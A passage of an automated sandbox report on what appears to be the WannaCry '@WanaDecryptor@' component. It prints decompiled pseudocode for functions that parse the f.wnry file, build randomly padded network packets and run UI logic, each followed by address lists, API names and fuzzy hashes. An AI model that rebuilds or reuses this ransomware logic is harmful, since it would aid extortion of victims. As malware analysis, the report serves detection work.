				_t103 = fopen("f.wnry", "rt");
				_t113 = _t111 - 0x8c4 + 8;
				if(_t103 != 0) {
					E00401E90( &_v1252, __eflags);
					_v4 = 0;
					_t43 = E00402020( &_v1252, 0, E00403810, 0);
					__eflags = _t43;
					if(_t43 != 0) {
						_t44 =  *(_t103 + 0xc);
						_v2256 = 0;
						__eflags = _t44 & 0x00000010;
						if((_t44 & 0x00000010) == 0) {
							while(1) {
								_v2252 = 0;
								memset( &_v2251, 0, 0xf9 << 2);
								asm("stosw");
								asm("stosb");
								_t52 = fgets( &_v2252, 0x3e7, _t103);
								_t113 = _t113 + 0x18;
								__eflags = _t52;
								if(_t52 == 0) {
									break;
								}
								asm("repne scasb");
								_t75 = 0xbadbac;
								__eflags = 0xbadbac;
								if(0xbadbac != 0) {
									while(1) {
										asm("repne scasb");
										_t78 =  !(_t75 | 0xffffffff) - 1;
										__eflags =  *((char*)(_t113 + _t78 + 0x13)) - 0xd;
										if( *((char*)(_t113 + _t78 + 0x13)) == 0xd) {
											goto L10;
										}
										L9:
										asm("repne scasb");
										_t78 =  !(_t78 | 0xffffffff) - 1;
										__eflags =  *((char*)(_t113 + _t78 + 0x13)) - 0xa;
										if( *((char*)(_t113 + _t78 + 0x13)) == 0xa) {
											goto L10;
										}
										asm("repne scasb");
										__eflags =  !(_t78 | 0xffffffff) != 1;
										if( !(_t78 | 0xffffffff) != 1) {
											_t58 = E00402650( &_v1252,  &_v2252);
											__eflags = _t58;
											if(_t58 != 0) {
												_t29 =  &_v2256;
												 *_t29 = _v2256 + 1;
												__eflags =  *_t29;
											}
										}
										goto L14;
										L10:
										asm("repne scasb");
										_t75 =  !(_t78 | 0xffffffff) - 1;
										 *((char*)(_t113 + _t75 + 0x13)) = 0;
										asm("repne scasb");
										_t78 =  !(_t75 | 0xffffffff) - 1;
										__eflags =  *((char*)(_t113 + _t78 + 0x13)) - 0xd;
										if( *((char*)(_t113 + _t78 + 0x13)) == 0xd) {
											goto L10;
										}
										goto L9;
									}
								}
								L14:
								__eflags =  *(_t103 + 0xc) & 0x00000010;
								if(( *(_t103 + 0xc) & 0x00000010) == 0) {
									continue;
								}
								break;
							}
						}
						fclose(_t103);
						__eflags = _v2256;
						_t36 = _v2256 > 0;
						__eflags = _t36;
						_v4 = 0xffffffff;
						E00401F30( &_v1252);
						 *[fs:0x0] = _v12;
						return 0 | _t36;
					} else {
						_v4 = 0xffffffff;
						E00401F30( &_v1252);
						__eflags = 0;
						 *[fs:0x0] = _v12;
						return 0;
					}
				} else {
					 *[fs:0x0] = _v12;
					return 0;
				}
			}


















                                                      0x00403af6
                                                      0x00403af8
                                                      0x00403afd
                                                      0x00403afe
                                                      0x00403b1d
                                                      0x00403b21
                                                      0x00403b26
                                                      0x00403b48
                                                      0x00403b5b
                                                      0x00403b62
                                                      0x00403b67
                                                      0x00403b69
                                                      0x00403b9b
                                                      0x00403b9e
                                                      0x00403ba2
                                                      0x00403ba4
                                                      0x00403bb2
                                                      0x00403bbd
                                                      0x00403bc1
                                                      0x00403bc3
                                                      0x00403bc5
                                                      0x00403bd1
                                                      0x00403bd3
                                                      0x00403bd6
                                                      0x00403bd8
                                                      0x00000000
                                                      0x00000000
                                                      0x00403be7
                                                      0x00403beb
                                                      0x00403beb
                                                      0x00403bec
                                                      0x00403bee
                                                      0x00403bf7
                                                      0x00403bfb
                                                      0x00403bfc
                                                      0x00403c01
                                                      0x00000000
                                                      0x00000000
                                                      0x00403c03
                                                      0x00403c0c
                                                      0x00403c10
                                                      0x00403c11
                                                      0x00403c16
                                                      0x00000000
                                                      0x00000000
                                                      0x00403c35
                                                      0x00403c39
                                                      0x00403c3a
                                                      0x00403c48
                                                      0x00403c4d
                                                      0x00403c4f
                                                      0x00403c51
                                                      0x00403c51
                                                      0x00403c51
                                                      0x00403c51
                                                      0x00403c4f
                                                      0x00000000
                                                      0x00403c18
                                                      0x00403c21
                                                      0x00403c25
                                                      0x00403c26
                                                      0x00403bf7
                                                      0x00403bfb
                                                      0x00403bfc
                                                      0x00403c01
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00403c01
                                                      0x00403bee
                                                      0x00403c55
                                                      0x00403c55
                                                      0x00403c59
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00403c59
                                                      0x00403c60
                                                      0x00403c62
                                                      0x00403c71
                                                      0x00403c73
                                                      0x00403c73
                                                      0x00403c7f
                                                      0x00403c8a
                                                      0x00403c9a
                                                      0x00403ca7
                                                      0x00403b6b
                                                      0x00403b72
                                                      0x00403b7d
                                                      0x00403b83
                                                      0x00403b8d
                                                      0x00403b9a
                                                      0x00403b9a
                                                      0x00403b28
                                                      0x00403b33
                                                      0x00403b40
                                                      0x00403b40

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: fopen
                                                      • String ID: f.wnry
                                                      • API String ID: 1432627528-2448388194
                                                      • Opcode ID: cf48eaa19fa84c87f31c2d63a6b3fa47abbd49c5c0666401f46844b5b3827a14
                                                      • Instruction ID: 4eb239c0cb280e6f7c3b00bdc2b89ffa7a6027cf1f229c631d6900f059da94bf
                                                      • Opcode Fuzzy Hash: cf48eaa19fa84c87f31c2d63a6b3fa47abbd49c5c0666401f46844b5b3827a14
                                                      • Instruction Fuzzy Hash: CF410B311087415BE324DF3899417ABBBD4FB80321F144A3EF4E6B22C1DF789A088796
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040D150 Relevance: 6.1, APIs: 4, Instructions: 122COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 74%
                                                      			E0040D150(int __eax, intOrPtr* __ecx, void* __edi, char _a4, char _a8, char _a12, intOrPtr* _a16) {
				char _v500;
				intOrPtr _v508;
				char _v520;
				char _v521;
				char _v528;
				char _v529;
				intOrPtr _v536;
				signed int _t42;
				short _t46;
				signed int _t48;
				int _t62;
				intOrPtr* _t63;
				intOrPtr _t67;
				intOrPtr _t81;
				void* _t82;
				void* _t83;
				void* _t89;
				void* _t94;
				intOrPtr* _t95;
				void* _t97;
				void* _t99;

				_t89 = __edi;
				_t63 = __ecx;
				_push(0);
				L0041303E();
				srand(__eax);
				_t99 =  &_v508 + 8;
				_t42 = rand();
				asm("cdq");
				_t94 = 0;
				_t81 = _t42 % 0xc8 + 0x1f;
				_v508 = _t81;
				if(_t81 > 0) {
					do {
						_t62 = rand();
						_t81 = _v508;
						 *(_t99 + _t94 + 0x14) = _t62;
						_t94 = _t94 + 1;
					} while (_t94 < _t81);
				}
				_t95 = _a16;
				_t97 = _t99 + _t81 - 0xb;
				if(_t95 != 0) {
					_push(_t89);
					memcpy(_t97, E0040D5C0(_t95), 7 << 2);
					_t99 = _t99 + 0xc;
					asm("movsw");
					asm("movsb");
					_t81 = _v508;
					_t95 = _a16;
				}
				 *((char*)(_t99 + _t81 + 0x14)) = _a4;
				_t82 = _t81 + 1;
				 *((char*)(_t99 + _t82 + 0x1c)) = _a8;
				_t83 = _t82 + 1;
				 *((char*)(_t99 + _t83 + 0x1c)) = _a12;
				_v508 = _t83 + 1;
				_t46 = E00412B00(_t97, 0x1f);
				_t67 = _v508;
				 *((short*)(_t99 + 8 + _t67 + 0x14)) = _t46;
				_t48 =  *((intOrPtr*)( *_t63 + 0x18))(2,  &_v500, _t67 + 2, 0);
				if(_t48 < 0) {
					L12:
					return _t48 | 0xffffffff;
				} else {
					E0040D5A0(_t63, _t97);
					_push( &_v528);
					_push( &_v520);
					_push( &_v521);
					_v528 = 0x1f4;
					if( *((intOrPtr*)( *_t63 + 0x1c))() < 0 || _v529 != 2) {
						_t48 =  *((intOrPtr*)( *_t63 + 0xc))();
						goto L12;
					} else {
						if(_t95 == 0) {
							L10:
							return 0;
						} else {
							_push(1);
							_push(_v536);
							_push( &_v528);
							_push(2);
							if( *((intOrPtr*)( *_t95 + 0x18))() == 0) {
								goto L10;
							} else {
								return  *((intOrPtr*)( *_t63 + 0xc))() | 0xffffffff;
							}
						}
					}
				}
			}
























                                                      0x0040d150
                                                      0x0040d159
                                                      0x0040d15b
                                                      0x0040d15d
                                                      0x0040d163
                                                      0x0040d168
                                                      0x0040d16b
                                                      0x0040d170
                                                      0x0040d176
                                                      0x0040d17a
                                                      0x0040d17f
                                                      0x0040d183
                                                      0x0040d185
                                                      0x0040d185
                                                      0x0040d18a
                                                      0x0040d18e
                                                      0x0040d192
                                                      0x0040d193
                                                      0x0040d185
                                                      0x0040d197
                                                      0x0040d19e
                                                      0x0040d1a4
                                                      0x0040d1a6
                                                      0x0040d1b7
                                                      0x0040d1b7
                                                      0x0040d1b9
                                                      0x0040d1bb
                                                      0x0040d1bc
                                                      0x0040d1c0
                                                      0x0040d1c7
                                                      0x0040d1d6
                                                      0x0040d1e1
                                                      0x0040d1e5
                                                      0x0040d1e9
                                                      0x0040d1ea
                                                      0x0040d1ef
                                                      0x0040d1f3
                                                      0x0040d1f8
                                                      0x0040d201
                                                      0x0040d215
                                                      0x0040d21a
                                                      0x0040d297
                                                      0x0040d2a1
                                                      0x0040d21c
                                                      0x0040d21f
                                                      0x0040d22a
                                                      0x0040d233
                                                      0x0040d234
                                                      0x0040d237
                                                      0x0040d244
                                                      0x0040d292
                                                      0x00000000
                                                      0x0040d24d
                                                      0x0040d24f
                                                      0x0040d282
                                                      0x0040d28b
                                                      0x0040d251
                                                      0x0040d257
                                                      0x0040d25d
                                                      0x0040d25e
                                                      0x0040d25f
                                                      0x0040d268
                                                      0x00000000
                                                      0x0040d26a
                                                      0x0040d27d
                                                      0x0040d27d
                                                      0x0040d268
                                                      0x0040d24f
                                                      0x0040d244

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: rand$srandtime
                                                      • String ID:
                                                      • API String ID: 1946231456-0
                                                      • Opcode ID: aeda45b4266ec6acd211240a262b9f529a391165e32c1a7dc214254ed02393b1
                                                      • Instruction ID: 99a3411600cb7ade80f66248b35b99165d2bae15bbb14ca3cd699ef114e4807e
                                                      • Opcode Fuzzy Hash: aeda45b4266ec6acd211240a262b9f529a391165e32c1a7dc214254ed02393b1
                                                      • Instruction Fuzzy Hash: 6E411231A083454BD314DE69D885BABFBD4AFD4710F04893EE885973C2DA78D94987E3
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00406A00 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 80%
                                                      			E00406A00(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12) {
				void* _t15;
				signed int _t23;
				intOrPtr* _t33;
				void* _t34;

				_t23 = _a12;
				_t33 = _a4;
				_push(_t23);
				_push(_a8);
				_t34 = __ecx;
				_push(_t33);
				L00412D6A();
				if(_t23 > 6) {
					L12:
					return _t15;
				} else {
					switch( *((intOrPtr*)(_t23 * 4 +  &M00406ABC))) {
						case 0:
							_push( *((intOrPtr*)(__ecx + 0x824)));
							_t17 =  *((intOrPtr*)( *_t33 + 0x34))();
							L00412D64();
							if(_t17 == 0x402) {
								L6:
								_push(0xe0e0);
								 *((intOrPtr*)( *_t33 + 0x38))();
							} else {
								L00412D64();
								if(_t17 == 0x3fe) {
									goto L6;
								} else {
									L00412D64();
									if(_t17 == 0x3fb) {
										goto L6;
									} else {
										_push(0xffffff);
										 *((intOrPtr*)( *_t33 + 0x38))();
									}
								}
							}
							_t35 =  *((intOrPtr*)(_t34 + 0x828));
							if(_t35 != 0) {
								goto L11;
							}
							return 0;
							goto L13;
						case 1:
							goto L12;
						case 2:
							_push( *((intOrPtr*)(__esi + 0x824)));
							__ecx = __edi;
							 *((intOrPtr*)( *__edi + 0x34))();
							if(__esi != 0) {
								L11:
								return  *((intOrPtr*)(_t35 + 4));
							}
							return 0;
							goto L13;
					}
				}
				L13:
			}







                                                      0x00406a01
                                                      0x00406a0c
                                                      0x00406a10
                                                      0x00406a11
                                                      0x00406a12
                                                      0x00406a14
                                                      0x00406a15
                                                      0x00406a1d
                                                      0x00406ab7
                                                      0x00406ab7
                                                      0x00406a23
                                                      0x00406a23
                                                      0x00000000
                                                      0x00406a32
                                                      0x00406a35
                                                      0x00406a3a
                                                      0x00406a44
                                                      0x00406a70
                                                      0x00406a72
                                                      0x00406a79
                                                      0x00406a46
                                                      0x00406a48
                                                      0x00406a52
                                                      0x00000000
                                                      0x00406a54
                                                      0x00406a56
                                                      0x00406a60
                                                      0x00000000
                                                      0x00406a62
                                                      0x00406a64
                                                      0x00406a6b
                                                      0x00406a6b
                                                      0x00406a60
                                                      0x00406a52
                                                      0x00406a7c
                                                      0x00406a84
                                                      0x00000000
                                                      0x00000000
                                                      0x00406a8c
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00406a97
                                                      0x00406a98
                                                      0x00406a9a
                                                      0x00406aa5
                                                      0x00406ab0
                                                      0x00000000
                                                      0x00406ab0
                                                      0x00406aad
                                                      0x00000000
                                                      0x00000000
                                                      0x00406a23
                                                      0x00000000

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #3089$#4476
                                                      • String ID:
                                                      • API String ID: 2870283385-0
                                                      • Opcode ID: 53d97fe879bd1ae3a70958cbaed72806608eb4448782c61a221ab90d014d582e
                                                      • Instruction ID: 793279239b1821bde48ff71d8c5d322d7df26b5d288dea54ba4f6719e02562de
                                                      • Opcode Fuzzy Hash: 53d97fe879bd1ae3a70958cbaed72806608eb4448782c61a221ab90d014d582e
                                                      • Instruction Fuzzy Hash: D91181323012018BC624EA59D584D7FB3A9EF89321B15842FE947E7391CB39ACA19B95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040D0A0 Relevance: 6.1, APIs: 4, Instructions: 64COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 91%
                                                      			E0040D0A0(int __eax, intOrPtr* __ecx, char _a4, char _a8) {
				char _v500;
				signed int _t22;
				signed int _t27;
				intOrPtr* _t32;
				void* _t40;
				void* _t43;
				void* _t44;
				void* _t45;
				void* _t46;
				void* _t49;

				_t32 = __ecx;
				_push(0);
				L0041303E();
				srand(__eax);
				_t49 =  &_v500 + 8;
				_t22 = rand();
				asm("cdq");
				_t40 = 0;
				_t43 = _t22 % 0xc8 + 0x1f;
				if(_t43 <= 0) {
					L2:
					_t41 = _t49 + _t43 - 0x13;
					 *((char*)(_t49 + _t43 + 0xc)) = _a4;
					_t44 = _t43 + 1;
					 *((char*)(_t49 + _t44 + 0x14)) = 0;
					_t45 = _t44 + 1;
					 *((char*)(_t49 + _t45 + 0x14)) = _a8;
					_t46 = _t45 + 1;
					 *((short*)(_t49 + 8 + _t46 + 0xc)) = E00412B00(_t49 + _t43 - 0x13, 0x1f);
					_t27 =  *((intOrPtr*)( *_t32 + 0x18))(2,  &_v500, _t46 + 2, 0);
					if(_t27 >= 0) {
						E0040D5A0(_t32, _t41);
						return 0;
					} else {
						return _t27 | 0xffffffff;
					}
				} else {
					goto L1;
				}
				do {
					L1:
					 *((char*)(_t49 + _t40 + 0xc)) = rand();
					_t40 = _t40 + 1;
				} while (_t40 < _t43);
				goto L2;
			}













                                                      0x0040d0a9
                                                      0x0040d0ab
                                                      0x0040d0ad
                                                      0x0040d0b3
                                                      0x0040d0b8
                                                      0x0040d0bb
                                                      0x0040d0c0
                                                      0x0040d0c6
                                                      0x0040d0cc
                                                      0x0040d0d1
                                                      0x0040d0e1
                                                      0x0040d0ef
                                                      0x0040d0f3
                                                      0x0040d0f7
                                                      0x0040d0fb
                                                      0x0040d100
                                                      0x0040d101
                                                      0x0040d105
                                                      0x0040d110
                                                      0x0040d124
                                                      0x0040d129
                                                      0x0040d13d
                                                      0x0040d14d
                                                      0x0040d12d
                                                      0x0040d137
                                                      0x0040d137
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040d0d3
                                                      0x0040d0d3
                                                      0x0040d0d8
                                                      0x0040d0dc
                                                      0x0040d0dd
                                                      0x00000000

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: rand$srandtime
                                                      • String ID:
                                                      • API String ID: 1946231456-0
                                                      • Opcode ID: bbdcb1e1a24d480e02c6f3989001f72fd3822a1270c55b374a5c1adf4e9cf230
                                                      • Instruction ID: 418ba94e1263f5c278544cd72932f8c5cb06cad23ebf9749a5f73f3a0ac0752c
                                                      • Opcode Fuzzy Hash: bbdcb1e1a24d480e02c6f3989001f72fd3822a1270c55b374a5c1adf4e9cf230
                                                      • Instruction Fuzzy Hash: CB113D3164935106D3207A2A6C02BAFAB949FE1728F04493FE9D9962C2C46C894E83F7
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00405180 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 71%
                                                      			E00405180(void* __ecx, intOrPtr _a4) {
				intOrPtr _t10;
				intOrPtr _t19;
				void* _t26;

				_t19 = _a4;
				_t26 = __ecx;
				_t10 =  *((intOrPtr*)(__ecx + 0x44));
				__imp___mbscmp(_t10, _t19);
				if(_t10 == 0) {
					return _t10;
				} else {
					_push(_t19);
					L00412DA0();
					 *((char*)(__ecx + 0x48)) = 1;
					if( *((intOrPtr*)(__ecx + 0x74)) == 0) {
						E00405800(__ecx, 0);
					}
					if( *((intOrPtr*)(_t26 + 0x70)) == 0) {
						E00405820(_t26, 0);
					}
					if( *((intOrPtr*)(_t26 + 0x49)) == 0) {
						return InvalidateRect( *(_t26 + 0x20), 0, 1);
					}
					return RedrawWindow( *(_t26 + 0x20), 0, 0, 0x121);
				}
			}






                                                      0x00405181
                                                      0x00405186
                                                      0x0040518a
                                                      0x00405191
                                                      0x0040519c
                                                      0x004051fb
                                                      0x0040519e
                                                      0x0040519e
                                                      0x004051a1
                                                      0x004051a9
                                                      0x004051af
                                                      0x004051b5
                                                      0x004051b5
                                                      0x004051bf
                                                      0x004051c5
                                                      0x004051c5
                                                      0x004051cf
                                                      0x00000000
                                                      0x004051f2
                                                      0x004051e7
                                                      0x004051e7

                                                      APIs
                                                      • _mbscmp.MSVCRT ref: 00405191
                                                      • #860.MFC42(?), ref: 004051A1
                                                      • RedrawWindow.USER32(?,00000000,00000000,00000121), ref: 004051DE
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 004051F2
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #860InvalidateRectRedrawWindow_mbscmp
                                                      • String ID:
                                                      • API String ID: 497622568-0
                                                      • Opcode ID: 4aae586b1cfc2d6b37c47d983e66569639a31ec6a673fed4d94bf49cd6230326
                                                      • Instruction ID: cf498a414c54833703d22adddad9dcc08bc55e2fe29af9a848031684a7c2f2b5
                                                      • Opcode Fuzzy Hash: 4aae586b1cfc2d6b37c47d983e66569639a31ec6a673fed4d94bf49cd6230326
                                                      • Instruction Fuzzy Hash: 7B01D871700B00A7D6209765DC59FDBB7E9EF98702F00442EF746EB2C0C675E4018B68
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00404430 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 79%
                                                      			E00404430(intOrPtr __ecx, char _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _t13;
				struct HICON__* _t16;
				struct HICON__* _t17;
				intOrPtr _t26;

				_t26 = __ecx;
				_t13 =  *((intOrPtr*)(__ecx + 0x59));
				if(_t13 != 0) {
					if( *((intOrPtr*)(__ecx + 0x5a)) == 0) {
						E00404530(__ecx);
					}
					if(E004045E0(_t26,  &_a8) == 0) {
						_t16 =  *(_t26 + 0x60);
					} else {
						_t16 =  *(_t26 + 0x5c);
					}
					_t17 = SetCursor(_t16);
					L00412CBC();
					return _t17;
				} else {
					_v16 = 0x10;
					if(__ecx != 0) {
						_t13 =  *((intOrPtr*)(__ecx + 0x20));
						_v8 = _t13;
					} else {
						_v8 = __ecx;
					}
					_v12 = 2;
					__imp___TrackMouseEvent( &_v16);
					 *((char*)(_t26 + 0x59)) = 1;
					L00412CBC();
					return _t13;
				}
			}










                                                      0x00404434
                                                      0x00404436
                                                      0x0040443b
                                                      0x00404480
                                                      0x00404484
                                                      0x00404484
                                                      0x00404497
                                                      0x0040449e
                                                      0x00404499
                                                      0x00404499
                                                      0x00404499
                                                      0x004044a2
                                                      0x004044aa
                                                      0x004044b3
                                                      0x0040443d
                                                      0x0040443f
                                                      0x00404447
                                                      0x0040444f
                                                      0x00404452
                                                      0x00404449
                                                      0x00404449
                                                      0x00404449
                                                      0x0040445a
                                                      0x00404463
                                                      0x0040446b
                                                      0x0040446f
                                                      0x00404478
                                                      0x00404478

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2379$CursorEventMouseTrack
                                                      • String ID:
                                                      • API String ID: 2186836335-0
                                                      • Opcode ID: 8cae4badaefa13b91853eadf55a8840a780c3bb417d72a3b214d508dff938200
                                                      • Instruction ID: d4ee5e4a134dc88e0fb0520758ee2c50d42c0b6297011b3ab606eb820e3435c7
                                                      • Opcode Fuzzy Hash: 8cae4badaefa13b91853eadf55a8840a780c3bb417d72a3b214d508dff938200
                                                      • Instruction Fuzzy Hash: 1501B5B46047209BC714EF1895047EFBBD46FC4718F40881EEAC557382E6B898058B99
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00404CF0 Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 85%
                                                      			E00404CF0(intOrPtr __ecx) {
				char _v4;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t13;
				intOrPtr* _t21;
				intOrPtr* _t22;
				intOrPtr _t27;

				_push(0xffffffff);
				_push(E0041384E);
				_t13 =  *[fs:0x0];
				_push(_t13);
				 *[fs:0x0] = _t27;
				_v20 = __ecx;
				_v4 = 0;
				_t21 = __ecx + 0x70;
				_v16 = _t21;
				 *_t21 = 0x415c00;
				_v4 = 3;
				L00412D52();
				 *_t21 = 0x415bec;
				_t22 = __ecx + 0x64;
				_v16 = _t22;
				 *_t22 = 0x415c00;
				_v4 = 4;
				L00412D52();
				 *_t22 = 0x415bec;
				_v4 = 0;
				L00412CC2();
				_v4 = 0xffffffff;
				L00412C86();
				 *[fs:0x0] = _v12;
				return _t13;
			}











                                                      0x00404cf0
                                                      0x00404cf2
                                                      0x00404cf7
                                                      0x00404cfd
                                                      0x00404cfe
                                                      0x00404d0c
                                                      0x00404d10
                                                      0x00404d18
                                                      0x00404d1b
                                                      0x00404d1f
                                                      0x00404d27
                                                      0x00404d2c
                                                      0x00404d31
                                                      0x00404d37
                                                      0x00404d3a
                                                      0x00404d3e
                                                      0x00404d46
                                                      0x00404d4b
                                                      0x00404d53
                                                      0x00404d59
                                                      0x00404d5e
                                                      0x00404d65
                                                      0x00404d6d
                                                      0x00404d78
                                                      0x00404d82

                                                      APIs
                                                      • #2414.MFC42(?,?,?,?,?,?,?,00404CD8), ref: 00404D2C
                                                      • #2414.MFC42(?,?,?,?,?,?,?,00404CD8), ref: 00404D4B
                                                      • #800.MFC42(?,?,?,?,?,?,?,00404CD8), ref: 00404D5E
                                                      • #641.MFC42(?,?,?,?,?,?,?,00404CD8), ref: 00404D6D
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2414$#641#800
                                                      • String ID:
                                                      • API String ID: 2580907805-0
                                                      • Opcode ID: 16959137cf9ed8865fc6a78509c90b23480716c09409454935714356ef62aba6
                                                      • Instruction ID: 6757f658c1b9d10fae8a918e1fd1a20a9830f850e3759812b0851a74ca26fea9
                                                      • Opcode Fuzzy Hash: 16959137cf9ed8865fc6a78509c90b23480716c09409454935714356ef62aba6
                                                      • Instruction Fuzzy Hash: F3012975508B42CBC300DF19C54538AFBE8BBE4710F54491EE095877A1D7F851998BD6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

